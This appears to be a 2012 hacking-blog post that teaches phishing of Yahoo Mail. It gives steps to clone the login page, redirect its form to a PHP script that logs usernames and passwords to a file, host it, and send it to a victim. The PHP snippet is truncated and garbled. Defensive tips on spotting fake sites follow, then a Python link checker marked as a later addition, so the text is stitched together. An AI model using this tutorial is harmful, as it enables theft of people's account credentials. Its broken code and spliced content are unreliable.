Wednesday 25 July 2012


PHISHING



Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Next in this tutorial I'll show how to phish a website. In this tutorial I'll be using http://mail.yahoo.com; from there you will definitely know how to phish any other website if you follow the tutorial correctly.

Step One: First of all choose your target. As in every other tutorial on phishing, we will start by creating a fake login page. To create the fake login page, open mail.yahoo.com in your web browser and save it on your desktop as “Web Page, Complete” with the name Yahoomail. Or you can visit the site's login page, right click on it and select "VIEW PAGE SOURCE"; when it appears, copy the whole HTML code given, paste it in notepad and save it as yahoomail.htm. After the above process you’ll have a file named Yahoomail.htm and a folder named Yahoomail_files in the folder in which you saved the web page. Now open Yahoomail.htm in notepad, search for the word action and locate the following string,

action="https://login.yahoo.com/config/login?"


Once located, change the action string to phish.php, so that the above string appears as follows,

action="phish.php"

Step two: Now step number two is to create phish.php file. So Open notepad and copy following code into it,

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as phish.php

Step 3: Now create an empty password log file log.txt by opening notepad and don't write anything in the notepad page and save it as "log.txt".

Now sign up for a free webhosting service which supports php. I'll suggest you use http://www.ripway.com or www.byethost.com.com, but I prefer http://www.byethost.com. Now upload Yahoomail.htm file, php file, password log file and Yahoomail_files folder to that web host. Change permission of log.txt file to 777 from settings. Now vector this phished site to victim to get his/her password.

Tips on How to identify a fake website

Check security signs while doing any money transaction

You must always look for “https” on any site where you enter sensitive information. This includes login pages, online shopping sites and bank web sites. Notice the extra “s”, which tells you that the connection to the server is secured, e.g. https://login.yahoo.com/config/login_verify2 for Yahoo login. On its own, https only shows that the connection is encrypted for the domain in the address bar, so check the domain name as well.
Notice the closed padlock on the lower right corner of the browser window. If you click on it, it will open a window that gives you more details regarding the certificate. Every company that asks you for sensitive information must have a digital certificate, preferably one from an established certificate authority.

Misspelled and fake URL Madness:-

Sometimes a site is replicated so well that you won't be able to find a difference even though it's really a fake one. You won’t be able to tell if a web site is a fake just by looking at the web design. These smart criminals can replicate any web site down to the last detail, and it wouldn’t surprise me if they used the same web designer to do it.

Take care of these things:-

Misspelled domains are big deceivers. Phishers will purchase a domain name that resembles the real domain. They will replace letters with numbers or with other letters. Pay close attention to the spelling of domain names, and learn to spot a fake like www.yohoo.com or http://www.paypol.com/.
Variations of domains should also be a red flag. Don’t click on any email that contains URLs like http://center.yahoo-security.net. A legitimate URL should read if it actually belongs to Yahoo! Anyone could’ve purchased www.yahoo-security.net for a scam (I’m just using Yahoo! as an example here).
Bare IP addresses are another warning sign. An IP address looks something like 102.199.60.250. Bottom line, never trust emails that point you to URLs that only show an IP address.
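
The tips above (https, look-alike spellings, a brand name inside an unrelated domain, bare IP addresses) can be applied automatically, for example to links in incoming mail. The following is an added example, not part of the original tutorial; the TRUSTED allowlist, the function names, the distance threshold and the two-label domain rule are assumptions made for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: domains the user really does business with.
TRUSTED = ("yahoo.com", "paypal.com")

def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-letter swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registered_domain(host):
    # Simplification: last two labels. Production code should consult
    # the Public Suffix List (e.g. for names under co.uk).
    return ".".join(host.split(".")[-2:])

def check_url(url):
    """Return a list of warnings for the signs described in the tips."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    warnings = []
    if parts.scheme != "https":
        warnings.append("no-https")
    try:
        ipaddress.ip_address(host)          # URL shows only an IP address
        return warnings + ["ip-address-host"]
    except ValueError:
        pass
    domain = registered_domain(host)
    if domain in TRUSTED:
        return warnings
    for good in TRUSTED:
        brand = good.split(".")[0]
        if edit_distance(domain, good) <= 2:    # yohoo.com, paypol.com
            warnings.append("lookalike-of:" + good)
        elif brand in host:                     # yahoo-security.net
            warnings.append("brand-in-untrusted-domain:" + brand)
    return warnings

if __name__ == "__main__":
    # Sample URLs are the ones quoted in the tips above.
    for u in ("https://login.yahoo.com/config/login_verify2", "www.yohoo.com",
              "http://center.yahoo-security.net", "http://102.199.60.250/login"):
        print(u, check_url(u))
```

An empty list means none of these signs were found; it does not mean the site is safe.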

IF YOU HAVE ANY PROBLEM, YOU CAN COMMENT

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY.
CYBER_HACKER HQ © 2012. All Rights Reserved